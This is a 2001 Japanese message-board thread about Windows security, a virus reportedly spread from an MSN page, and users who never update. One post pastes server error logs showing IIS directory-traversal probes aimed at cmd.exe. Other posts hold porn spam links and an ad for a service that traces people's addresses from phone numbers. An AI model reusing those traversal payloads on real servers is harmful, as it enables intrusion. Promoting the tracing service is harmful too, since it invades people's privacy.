
148 :名無しさん@お腹いっぱい。:01/09/20 10:41
Outlookのプレビュー機能だけは即刻廃止させた方がいいだろうな

149 :名無しさん@お腹いっぱい。:01/09/20 11:21
>>142
UNIXとかならそういう主張も説得力あるけど、
WINDOWSは知識持ってる奴だけが使う物じゃないからね・・・
XP祭りなんかやってる場合かM$

150 :名無しさん@お腹いっぱい。:01/09/20 17:10
>>142
いま「IT講習」とかいって、60歳過ぎたじーちゃんばーちゃん
だってOUTLOOKやIE使ってネットしているよ。っていうか、
それ以外の方法を知らない。
アップグレードの仕方は教えているのかな。心配。

151 :名無しさん@お腹いっぱい。:01/09/20 20:05
>>150
アップグレードなんか教えてないね。
使うだけでせーいっぱいなのに、どーやって教えるんだ?
使えればいいのであって、それ以上のことは学ぼうとしないよ。
ジジババだけじゃなく、たいていのWinユーザーがそうだと思うよ。
痛い目に会わないとわからないんだよ。
感染しててもわからないに、1000000ペリカ。

おれも10年以上の昔にブートセクターウィルスにやられてから、いろいろと学んだよ。

「転んでも泣かない!」

152 :名無しさん@お腹いっぱい。:01/09/20 21:03
>>150
そういえばPCショップで老夫婦がシンクパッド持ってきて
店員に「ああ、これなら再インストールで直りますよ」と
あっさり言われて「さい・・・なんとか?」とつぶやいて
立ち尽くしていたのを思い出す。

インターネットボタンとかテレビ録画だとかいかにも簡単
そうに宣伝しておいてリカバリーになったとたんDOS画面
だもんな。そんなんだったら「バックアップボタン」とか
「再インストール」ボタンでも付けた方がユーザー喜ぶよね。

153 :名無しさん@お腹いっぱい。:01/09/20 21:29
IEの方から「重要なエラー」とかいうダイアログが出たんですけど、なに?
出た人いますか?

154 : :01/09/20 21:42
>>153
出た出た。
それ、送信しないほうがいい。
MSに情報もっていかれる。

155 :名無しさん@お腹いっぱい。:01/09/20 21:56
>>154さん
送信しちゃったよ。。。
どうなるのかな?
俺のPCなんてろくなものは言ってないのに。。。

156 :初心者な人:01/09/21 00:17
申し訳ありません、ここで言うMSとは何でしょか?

157 :ahya:01/09/21 00:23
>>156ネタだよな?
しかしWINは大変だな。LINUX厨房の俺には関係ないが

158 :156です:01/09/21 00:29
すみません、正気なんです。あわわわわぁ・・・

159 :名無しさん@お腹いっぱい。:01/09/21 00:57
>>156
MS=M$

160 :野次馬バカ:01/09/21 01:04
確かおとといの夜だったかな・・・?
ここで『MSNがウィルスばら撒いてる』っての見て、
好奇心で見に行ってしまった・・・バカだ。
幸いにも『ページが表示できません』で繋がらなか
ったみたいだが・・・今考えるとぞっとする。

161 :156です:01/09/21 01:09
>>159
M$・・・・・

・・・・・・・すみません、厨房です。
初心者板逝って来ます。

162 :野次馬で感染したら自業自得か?:01/09/21 01:09
漏れもそう。
ニュースサイトで知って、ホントかよ・・・
と思って2ちゃんで知ったアドレスにレッツアクセス!

昨日から大惨事。
自業自得か・・・・

163 :ふーん:01/09/21 01:10
>>161
マイクロソフト以外に何があるってんだ?

164 :名無しさん@お腹いっぱい。:01/09/21 01:13
http://210.135.201.16/

165 :名無しさん@お腹いっぱい。:01/09/21 01:13
>>156
某シュレッダー大手

166 :156です:01/09/21 01:18
>>163
マイクロソフト・・・うわぁ、アホだ俺・・・。
ご迷惑おかけしました、やっぱ逝ってきます。

167 :名無しさん@お腹いっぱい。:01/09/21 10:25
騙されてるよ、モビールスーツに決まってるジャン
みんな初心者をもてあそんじゃ可哀相だよ。

168 :名無しさん@お腹いっぱい。:01/09/21 13:25
いやいや。
msとは、マンコ・セクースのことだよ。

169 :-:01/09/21 13:29
モロ、無修正画像サイト発見!

http://www.sex-jp.net/dh/01/
http://www.sex-jp.net/dh/02/
http://www.sex-jp.net/dh/03/
http://www.sex-jp.net/dh/04/

170 :名無しさん@お腹いっぱい。:01/09/21 13:48
nikuyoku893@hotmail.com

171 :  :01/09/21 22:57
www.hnmc.edu.cn.
211.67.232.4 Fri Sep 21 19:41:38 2001 error File does not exist: /home/httpd/htdocs/c/winnt/system32/cmd.exe
www.hnmc.edu.cn.
211.67.232.4 Fri Sep 21 19:41:40 2001 error File does not exist: /home/httpd/htdocs/d/winnt/system32/cmd.exe
www.hnmc.edu.cn.
211.67.232.4 Fri Sep 21 19:41:42 2001 error File does not exist: /home/httpd/htdocs/scripts/..%5c../winnt/system32/cmd.exe
www.hnmc.edu.cn.
211.67.232.4 Fri Sep 21 19:41:44 2001 error File does not exist: /home/httpd/htdocs/_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe
www.hnmc.edu.cn.
211.67.232.4 Fri Sep 21 19:41:47 2001 error File does not exist: /home/httpd/htdocs/_mem_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe
www.hnmc.edu.cn.
211.67.232.4 Fri Sep 21 19:41:52 2001 error File does not exist: /home/httpd/htdocs/msadc/..%5c../..%5c../..%5c/..チ../..チ../..チ../winnt/system32/cmd.exe
www.hnmc.edu.cn.
211.67.232.4 Fri Sep 21 19:41:54 2001 error File does not exist: /home/httpd/htdocs/scripts/..チ../winnt/system32/cmd.exe
www.hnmc.edu.cn.
211.67.232.4 Fri Sep 21 19:41:58 2001 error File does not exist: /home/httpd/htdocs/scripts/..タッ../winnt/system32/cmd.exe
www.hnmc.edu.cn.
211.67.232.4 Fri Sep 21 19:42:01 2001 error File does not exist: /home/httpd/htdocs/scripts/..チ・./winnt/system32/cmd.exe
www.hnmc.edu.cn.
211.67.232.4 Fri Sep 21 19:42:10 2001 error File does not exist: /home/httpd/htdocs/scripts/..%5c../winnt/system32/cmd.exe
www.hnmc.edu.cn.
211.67.232.4 Fri Sep 21 19:42:16 2001 error File does not exist: /home/httpd/htdocs/scripts/..%2f../winnt/system32/cmd.exe

172 :>152:01/09/21 23:09
きまりきったアプリしか使わなくてアップデートもさほど必要じゃないってユーザ層に
システムやアプリはCD-ROM みたいな書きこみ不可能な媒体で動かす
マシン発売すりゃいいんだよ。
昔のワープロ専用機みたいに。
クラッシュの心配はほぼないし、ウイルス汚染もかなり減るだろ。
取り扱い簡単になるはず。

173 :>172:01/09/21 23:54
昔、それに似たようなパソコンが売られてたような、、
どうなんたんだろう?

確か勝手にパソコンがアップデートしてくれるマシン。
ユーザーは何もしなくてよかったと思う

174 :名無しさん@お腹いっぱい。:01/09/22 00:00
トレンドマイクロのサイトに行って
オンラインで探したところ(無料)
7つの感染ファイルがみつかりました。
MSNのホームページから勝手にダウンロードされた
圧縮ファイルのようです。
削除したけど・・・もう大丈夫かな?

175 :152:01/09/22 09:42
>>172
あはは!そりゃ良いや。メール、ブラウザ、オフィス、年賀状
位しか使ってないんだからな。

176 :名無しさん@お腹いっぱい。:01/09/22 10:32
かんめーないけど
まきはらとさいとーがいんたいだってね

http://www.sponichi.co.jp/baseball/kiji/2001/09/22/01.html

177 :回線さえ速けりゃ:01/09/22 12:03
PCにOS未搭載する。
BIOSがネット機能持て。boot時に選択メニュー(もちろんお気に入りのOS群)
がでる。ネットからOSを見つけてbootする。メーカーのServerでもいいし、その辺のユーザーPCの読込済みのでもいいじゃん。
OS部分は共有化だな。NapsterやWINMXみたいにさ。ついでにアプリも共有しちゃえ。
もはやHDDは自前のデータだけになり、寂しい俺としては40MBディスク復活希望。

178 :回線さえ速けりゃ2:01/09/22 12:04
ISPが10メガ用意しているので、お前はディスクも要らぬと 後ろから声がした。

179 :名無しさん@お腹いっぱい。:01/09/22 12:23
ようするにロムブート。

180 :名無しさん@明日があるさ:01/09/22 12:37
意訳してロンブー

181 :名無しさん@お腹いっぱい。:01/09/22 13:47
>>180
パソコンのネットワークカードに御茶目なプログラムが
乗ってて、電源入れたときにディスクが使えない OR
使わないとしよう。 そうすっと、
「俺んち何もねーからアドレスくれYO!」とか、
「次何したらいーかわかんねーからおせーて」とか、
とにかく教えてクンモードになっちゃうのが”ろむぶー”
親切などぜう^H^H^H鯖が出てきてこんにちは、ぼっちゃん「あれせい。
これやる」と死ぬまで面倒見てやるってパターン。 うんDOZEだと、
Cドライブまでサーバから共有フォルダになってる
パターンだな。 終わり。

182 :>:01/09/22 14:20
家電とか車なみに普及し、
ユーザがそういう範囲に広がるんなら
OSやアプリが書き換え不可能な媒体での運用
というマシンをメーカは真剣に考えるべきだろ。

家電や車をコントロールしてるソフトウエア
EPROMその他を媒体としている。
 悪意のある部外者が悪意をもったさわり方をしたり
 未熟なユーザが誤操作をしても
媒体に書いてある内容が悪い改変を受けることは
まあないでしょう。

183 :ブラックリスト:01/09/22 14:31
騙された・捨てられた・弄ばれた・相手に誠意がない・債権トラブル・不倫疑惑・証拠が欲しい・電話番号などから住所などの詳細を調べて欲しい・等など
何でも気軽に相談下さい。確実に貴方の悩みや困り事、トラブル等を迅速に解決致します。
i-mode・j-sky対応
http://www.black-893.com
★裏社会の会議室が只今、会議中!!!


☆女性事務スタッフ募集中!高収入確実!!!

184 :  :01/09/22 15:26
>>騙された・捨てられた・弄ばれた・相手に誠意がない・
MSの事・?

43 KB
■ このスレッドは過去ログ倉庫に格納されています

★スマホ版★ 掲示板に戻る 全部 前100 次100 最新50

read.cgi ver 05.02.02 2014/06/23 Mango Mangüé ★
FOX ★ DSO(Dynamic Shared Object)